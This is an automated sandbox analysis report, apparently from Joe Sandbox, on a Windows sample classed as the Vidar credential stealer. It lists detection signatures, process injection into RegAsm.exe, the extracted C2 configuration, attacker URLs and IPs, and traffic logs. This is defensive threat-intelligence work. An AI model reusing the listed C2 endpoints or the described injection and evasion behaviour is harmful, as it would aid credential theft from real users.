Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1459509
MD5:	2a042e0136d2125e744724a757f33950
SHA1:	d3f5304872ff4b795cde48914fa4d81768abba5d
SHA256:	65746b8a8fddc5dfb1602a3a5605cd039476bab5e66076bc729b987793986e0e
Tags:	exe
Infos:

Detection

Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected Powershell download and execute

Yara detected Vidar stealer

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Country aware sample found (crashes after keyboard check)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Searches for specific processes (likely to inject)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

One or more processes crash

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 5572 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 2A042E0136D2125E744724A757F33950)

RegAsm.exe (PID: 8 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 2060 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 3872 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

WerFault.exe (PID: 6880 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5572 -s 336 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199699680841", "https://t.me/memve4erin"], "Botnet": "673ad4d1558c47b58d4f59c1d86488e2"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x23208:$s1: JohnDoe 0x23200:$s2: HAL9TH
00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 5572	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 5572	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: RegAsm.exe PID: 3872	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 3872	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: RegAsm.exe PID: 3872	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 3872	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 5 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.RegAsm.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
3.2.RegAsm.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x22408:$s1: JohnDoe 0x22400:$s2: HAL9TH
3.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
3.2.RegAsm.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x23208:$s1: JohnDoe 0x23200:$s2: HAL9TH
0.2.file.exe.fd0000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.file.exe.fd0000.0.unpack	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x5a248:$s1: JohnDoe 0x5a240:$s2: HAL9TH
Click to see the 1 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://162.55.53.18:9000/A	Avira URL Cloud: Label: malware
Source: https://162.55.53.18:9000/softokn3.dllEdge	Avira URL Cloud: Label: malware
Source: https://162.55.53.18:9000/B	Avira URL Cloud: Label: malware
Source: https://t.me/memve4erin	Avira URL Cloud: Label: malware
Source: https://162.55.53.18:9000/softokn3.dll10.15;	Avira URL Cloud: Label: malware
Source: https://162.55.53.18:9000/freebl3.dllu	Avira URL Cloud: Label: malware
Source: https://162.55.53.18:9000/sqlt.dll	Avira URL Cloud: Label: malware
Source: https://162.55.53.18:9000/46ff6le	Avira URL Cloud: Label: malware
Source: https://162.55.53.18:9000/msvcp140.dll	Avira URL Cloud: Label: malware
Source: https://162.55.53.18:9000/tm	Avira URL Cloud: Label: malware
Source: https://162.55.53.18:9000/softokn3.dll	Avira URL Cloud: Label: malware
Source: https://162.55.53.18:9000/msvcp140.dllEdge	Avira URL Cloud: Label: malware
Source: https://162.55.53.18:9000/vcruntime140.dllUser	Avira URL Cloud: Label: malware
Source: https://162.55.53.18:9000/p	Avira URL Cloud: Label: malware
Source: https://162.55.53.18:9000/MH	Avira URL Cloud: Label: malware
Source: https://162.55.53.18:9000/l	Avira URL Cloud: Label: malware
Source: https://162.55.53.18:9000/freebl3.dllsposition:	Avira URL Cloud: Label: malware
Source: https://162.55.53.18:9000/bW	Avira URL Cloud: Label: malware
Source: https://162.55.53.18:9000/vcruntime140.dlle	Avira URL Cloud: Label: malware
Source: https://162.55.53.18:9000/	Avira URL Cloud: Label: malware
Source: https://162.55.53.18:9000/sqlt.dllB	Avira URL Cloud: Label: malware
Source: https://162.55.53.18:9000/ZG	Avira URL Cloud: Label: malware
Source: https://162.55.53.18:9000/nss3.dlloft	Avira URL Cloud: Label: malware
Source: https://162.55.53.18:9000/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: https://162.55.53.18:9000/Zm	Avira URL Cloud: Label: malware
Source: https://162.55.53.18:9000/$	Avira URL Cloud: Label: malware
Source: https://162.55.53.18:9000/freebl3.dll	Avira URL Cloud: Label: malware
Source: https://162.55.53.18:9000/vcruntime140.dllA	Avira URL Cloud: Label: malware
Source: https://162.55.53.18:9000/cG4	Avira URL Cloud: Label: malware
Source: https://162.55.53.18:9000/vcruntime140.dllppet	Avira URL Cloud: Label: malware
Source: https://162.55.53.18:9000/nss3.dllJ	Avira URL Cloud: Label: malware
Source: https://162.55.53.18:9000	Avira URL Cloud: Label: malware
Source: https://162.55.53.18:9000/softokn3.dll2	Avira URL Cloud: Label: malware
Source: https://162.55.53.18:9000/nss3.dll	Avira URL Cloud: Label: malware
Source: https://162.55.53.18:9000/4	Avira URL Cloud: Label: malware
Source: https://162.55.53.18/	Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199699680841	Avira URL Cloud: Label: malware
Source: https://162.55.53.18:9000/freebl3.dll~	Avira URL Cloud: Label: malware
Source: https://162.55.53.18:9000/mozglue.dll	Avira URL Cloud: Label: malware
Source: https://162.55.53.18:9000/.53.18:9000/	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp

Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199699680841", "https://t.me/memve4erin"], "Botnet": "673ad4d1558c47b58d4f59c1d86488e2"}

Multi AV Scanner detection for domain / URL

Source: https://162.55.53.18:9000/sqlt.dll	Virustotal: Detection: 15%	Perma Link
Source: https://162.55.53.18:9000/msvcp140.dll	Virustotal: Detection: 10%	Perma Link
Source: https://162.55.53.18:9000/msvcp140.dllEdge	Virustotal: Detection: 10%	Perma Link
Source: https://162.55.53.18:9000/l	Virustotal: Detection: 10%	Perma Link
Source: https://162.55.53.18:9000/	Virustotal: Detection: 15%	Perma Link

Multi AV Scanner detection for submitted file

Source: file.exe

Virustotal: Detection: 37%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00406DE2 CryptUnprotectData,LocalAlloc,LocalFree,	3_2_00406DE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040245C memset,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,	3_2_0040245C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00411A55 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	3_2_00411A55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00406D7F CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	3_2_00406D7F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00408E1E memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,	3_2_00408E1E

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49731 version: TLS 1.2

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:

Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2943981511.0000000015676000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.3.dr

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00FF3EC7 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00FF3EC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040D1BA _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_0040D1BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040A025 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040A025
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00417148 _EH_prolog,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,	3_2_00417148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00401162 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	3_2_00401162
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040A440 _EH_prolog,StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040A440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040B4C3 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,	3_2_0040B4C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00417591 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	3_2_00417591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004166D7 _EH_prolog,wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,memset,lstrcat,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,	3_2_004166D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040AAB4 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	3_2_0040AAB4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00416DA3 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	3_2_00416DA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040BFA5 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040BFA5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00416B24 _EH_prolog,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,

3_2_00416B24

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199699680841
Source: Malware configuration extractor	URLs: https://t.me/memve4erin

Source: global traffic

TCP traffic: 192.168.2.4:49733 -> 162.55.53.18:9000

Source: global traffic

HTTP traffic detected: GET /memve4erin HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 162.55.53.18 162.55.53.18
Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99

Source: Joe Sandbox View

ASN Name: TELEGRAMRU TELEGRAMRU

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	TCP traffic detected without corresponding DNS query: 162.55.53.18
Source: unknown	TCP traffic detected without corresponding DNS query: 162.55.53.18
Source: unknown	TCP traffic detected without corresponding DNS query: 162.55.53.18
Source: unknown	TCP traffic detected without corresponding DNS query: 162.55.53.18
Source: unknown	TCP traffic detected without corresponding DNS query: 162.55.53.18
Source: unknown	TCP traffic detected without corresponding DNS query: 162.55.53.18
Source: unknown	TCP traffic detected without corresponding DNS query: 162.55.53.18
Source: unknown	TCP traffic detected without corresponding DNS query: 162.55.53.18
Source: unknown	TCP traffic detected without corresponding DNS query: 162.55.53.18
Source: unknown	TCP traffic detected without corresponding DNS query: 162.55.53.18
Source: unknown	TCP traffic detected without corresponding DNS query: 162.55.53.18
Source: unknown	TCP traffic detected without corresponding DNS query: 162.55.53.18
Source: unknown	TCP traffic detected without corresponding DNS query: 162.55.53.18
Source: unknown	TCP traffic detected without corresponding DNS query: 162.55.53.18
Source: unknown	TCP traffic detected without corresponding DNS query: 162.55.53.18
Source: unknown	TCP traffic detected without corresponding DNS query: 162.55.53.18
Source: unknown	TCP traffic detected without corresponding DNS query: 162.55.53.18
Source: unknown	TCP traffic detected without corresponding DNS query: 162.55.53.18
Source: unknown	TCP traffic detected without corresponding DNS query: 162.55.53.18
Source: unknown	TCP traffic detected without corresponding DNS query: 162.55.53.18
Source: unknown	TCP traffic detected without corresponding DNS query: 162.55.53.18
Source: unknown	TCP traffic detected without corresponding DNS query: 162.55.53.18
Source: unknown	TCP traffic detected without corresponding DNS query: 162.55.53.18
Source: unknown	TCP traffic detected without corresponding DNS query: 162.55.53.18
Source: unknown	TCP traffic detected without corresponding DNS query: 162.55.53.18
Source: unknown	TCP traffic detected without corresponding DNS query: 162.55.53.18
Source: unknown	TCP traffic detected without corresponding DNS query: 162.55.53.18
Source: unknown	TCP traffic detected without corresponding DNS query: 162.55.53.18
Source: unknown	TCP traffic detected without corresponding DNS query: 162.55.53.18
Source: unknown	TCP traffic detected without corresponding DNS query: 162.55.53.18
Source: unknown	TCP traffic detected without corresponding DNS query: 162.55.53.18
Source: unknown	TCP traffic detected without corresponding DNS query: 162.55.53.18
Source: unknown	TCP traffic detected without corresponding DNS query: 162.55.53.18
Source: unknown	TCP traffic detected without corresponding DNS query: 162.55.53.18
Source: unknown	TCP traffic detected without corresponding DNS query: 162.55.53.18
Source: unknown	TCP traffic detected without corresponding DNS query: 162.55.53.18
Source: unknown	TCP traffic detected without corresponding DNS query: 162.55.53.18
Source: unknown	TCP traffic detected without corresponding DNS query: 162.55.53.18
Source: unknown	TCP traffic detected without corresponding DNS query: 162.55.53.18
Source: unknown	TCP traffic detected without corresponding DNS query: 162.55.53.18
Source: unknown	TCP traffic detected without corresponding DNS query: 162.55.53.18
Source: unknown	TCP traffic detected without corresponding DNS query: 162.55.53.18
Source: unknown	TCP traffic detected without corresponding DNS query: 162.55.53.18
Source: unknown	TCP traffic detected without corresponding DNS query: 162.55.53.18
Source: unknown	TCP traffic detected without corresponding DNS query: 162.55.53.18
Source: unknown	TCP traffic detected without corresponding DNS query: 162.55.53.18
Source: unknown	TCP traffic detected without corresponding DNS query: 162.55.53.18
Source: unknown	TCP traffic detected without corresponding DNS query: 162.55.53.18
Source: unknown	TCP traffic detected without corresponding DNS query: 162.55.53.18
Source: unknown	TCP traffic detected without corresponding DNS query: 162.55.53.18

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_004041B2 _EH_prolog,GetProcessHeap,RtlAllocateHeap,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

3_2_004041B2

Source: global traffic

HTTP traffic detected: GET /memve4erin HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache

Source: global traffic

DNS traffic detected: DNS query: t.me

Source: 77EC63BDA74BD0D0E0426DC8F80085060.3.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: RegAsm.exe, 00000003.00000002.2942656368.0000000000FF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabtO
Source: RegAsm.exe, 00000003.00000002.2942656368.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enN
Source: Amcache.hve.6.dr	String found in binary or memory: http://upx.sf.net
Source: RegAsm.exe, 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2943981511.0000000015676000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.3.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: RegAsm.exe, 00000003.00000002.2942794241.0000000001009000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://162.55.53.18/
Source: RegAsm.exe, 00000003.00000002.2942656368.0000000000FF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://162.55.53.18:9000
Source: RegAsm.exe, 00000003.00000002.2942919191.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://162.55.53.18:9000/
Source: RegAsm.exe, 00000003.00000002.2942794241.0000000001009000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://162.55.53.18:9000/$
Source: RegAsm.exe, 00000003.00000002.2942919191.00000000010BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://162.55.53.18:9000/.53.18:9000/
Source: RegAsm.exe, 00000003.00000002.2942919191.00000000010CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://162.55.53.18:9000/4
Source: RegAsm.exe, 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://162.55.53.18:9000/46ff6le
Source: RegAsm.exe, 00000003.00000002.2942919191.00000000010BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://162.55.53.18:9000/A
Source: RegAsm.exe, 00000003.00000002.2942919191.00000000010BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://162.55.53.18:9000/B
Source: RegAsm.exe, 00000003.00000002.2942919191.00000000010CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://162.55.53.18:9000/MH
Source: RegAsm.exe, 00000003.00000002.2942919191.00000000010CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://162.55.53.18:9000/ZG
Source: RegAsm.exe, 00000003.00000002.2942919191.00000000010CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://162.55.53.18:9000/Zm
Source: RegAsm.exe, 00000003.00000002.2942919191.00000000010CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://162.55.53.18:9000/bW
Source: RegAsm.exe, 00000003.00000002.2942919191.00000000010CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://162.55.53.18:9000/cG4
Source: RegAsm.exe, 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://162.55.53.18:9000/freebl3.dll
Source: RegAsm.exe, 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://162.55.53.18:9000/freebl3.dllsposition:
Source: RegAsm.exe, 00000003.00000002.2942919191.00000000010CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://162.55.53.18:9000/freebl3.dllu
Source: RegAsm.exe, 00000003.00000002.2942919191.00000000010CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://162.55.53.18:9000/freebl3.dll~
Source: RegAsm.exe, 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://162.55.53.18:9000/l
Source: RegAsm.exe, 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://162.55.53.18:9000/mozglue.dll
Source: RegAsm.exe, 00000003.00000002.2942919191.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://162.55.53.18:9000/msvcp140.dll
Source: RegAsm.exe, 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://162.55.53.18:9000/msvcp140.dllEdge
Source: RegAsm.exe, 00000003.00000002.2942919191.00000000010E2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://162.55.53.18:9000/nss3.dll
Source: RegAsm.exe, 00000003.00000002.2942919191.00000000010E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://162.55.53.18:9000/nss3.dllJ
Source: RegAsm.exe, 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://162.55.53.18:9000/nss3.dlloft
Source: RegAsm.exe, 00000003.00000002.2942919191.00000000010CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://162.55.53.18:9000/p
Source: RegAsm.exe, 00000003.00000002.2942919191.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://162.55.53.18:9000/softokn3.dll
Source: RegAsm.exe, 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://162.55.53.18:9000/softokn3.dll10.15;
Source: RegAsm.exe, 00000003.00000002.2942919191.00000000010E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://162.55.53.18:9000/softokn3.dll2
Source: RegAsm.exe, 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://162.55.53.18:9000/softokn3.dllEdge
Source: RegAsm.exe, 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://162.55.53.18:9000/sqlt.dll
Source: RegAsm.exe, 00000003.00000002.2942919191.00000000010E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://162.55.53.18:9000/sqlt.dllB
Source: RegAsm.exe, 00000003.00000002.2942919191.00000000010CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://162.55.53.18:9000/tm
Source: RegAsm.exe, 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://162.55.53.18:9000/vcruntime140.dll
Source: RegAsm.exe, 00000003.00000002.2942919191.00000000010E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://162.55.53.18:9000/vcruntime140.dllA
Source: RegAsm.exe, 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://162.55.53.18:9000/vcruntime140.dllUser
